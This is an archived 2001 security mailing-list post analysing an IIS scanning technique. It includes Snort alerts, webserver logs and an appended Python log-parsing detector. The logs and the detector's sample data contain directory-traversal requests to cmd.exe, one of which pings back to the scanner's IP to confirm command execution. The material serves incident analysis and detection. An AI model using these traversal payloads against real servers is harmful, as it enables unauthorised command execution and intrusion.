Sneaky vuln-scanning, vulnerable list generation

From: Keith.Morgan (Keith.Morganat_private)
Date: Fri Jul 27 2001 - 10:08:34 PDT

    I don't think this is a worm.   I think this is most probably a black-hat
    scanning technique.
    
    Note the command the scanner attempted to execute.  A single ping-back to
    the scanning machine.  This would allow the scanner to easily generate a
    list of vulnerable boxen.
    
    Attached are intrusion detection system and webserver logs in EST.
    
    Jul 27 11:02:30 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2724 -> Pub.IP.Address:80
    Jul 27 11:02:34 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2828 -> Pub.IP.Address:80
    Jul 27 11:02:37 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2927 -> Pub.IP.Address:80
    Jul 27 11:02:45 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2724 -> Pub.IP.Address:80
    Jul 27 11:02:55 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2924 -> Pub.IP.Address:80
    Jul 27 11:03:10 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2924 -> Pub.IP.Address:80
    
    2001-07-27 11:02:39 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
    2001-07-27 11:02:56 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
    
    
    Keith T. Morgan
    Chief of Information Security
    Terradon Communications
    keith.morganat_private
    304-755-8291 x142
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
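As an added detection example (not part of the original post): the check below parses IIS W3C log lines like the ones above, flags requests that traverse to cmd.exe, and separates the ping-back scan the poster describes (the ping target equals the requesting IP) from other command attempts. The sample log is constructed; the server IP 10.0.0.5 and the two extra lines are made up, and the garbled user-agent field from the post is left out.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log sample modelled on the entries in the post above.
# Field order: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem
# cs-uri-query sc-status cs(User-Agent).  Server IP and the last two lines
# are invented for the example.
SAMPLE_LOG = """\
2001-07-27 11:02:39 24.41.72.83 - 10.0.0.5 80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
2001-07-27 11:02:56 24.41.72.83 - 10.0.0.5 80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
2001-07-27 11:05:00 192.0.2.10 - 10.0.0.5 80 GET /index.html - 200 -
2001-07-27 11:06:12 198.51.100.7 - 10.0.0.5 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<client>\S+) (?P<user>\S+) (?P<server>\S+) "
    r"(?P<port>\d+) (?P<method>[A-Z]+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d+)"
)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def analyse(log_text):
    """Return one finding per request that reaches cmd.exe via traversal."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Decode %5c etc. once, then normalise backslashes so "..\" and "../"
        # look alike.  Overlong sequences such as %c0%af decode to U+FFFD,
        # which still leaves the ".." and "cmd.exe" markers visible.
        stem = unquote(m["stem"]).replace("\\", "/").lower()
        if ".." not in stem or "cmd.exe" not in stem:
            continue
        # IIS logs the query with '+' for spaces: "/c+ping+-n+1+..." is the
        # exact command line handed to cmd.exe.
        argv = m["query"].replace("+", " ").split()
        targets = [a for a in argv if IPV4_RE.match(a)] if "ping" in argv else []
        findings.append({
            "client": m["client"],
            "command": " ".join(argv),
            "ping_targets": targets,
            # A ping aimed back at the requester is the scanner's
            # "did this box run my command?" confirmation.
            "pingback_to_source": m["client"] in targets,
        })
    return findings


def pingback_scanners(log_text):
    """Source IPs that used the ping-back trick to confirm command execution."""
    return {f["client"] for f in analyse(log_text) if f["pingback_to_source"]}
```

The 501 in the post's own lines means the server refused the request, so a matching outbound ICMP echo from the web server (here a single 128-byte packet) is what would actually confirm exposure; correlating this log with egress ICMP from the server closes the loop.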
    



    This archive was generated by hypermail 2b30 : Sun Jul 29 2001 - 09:22:01 PDT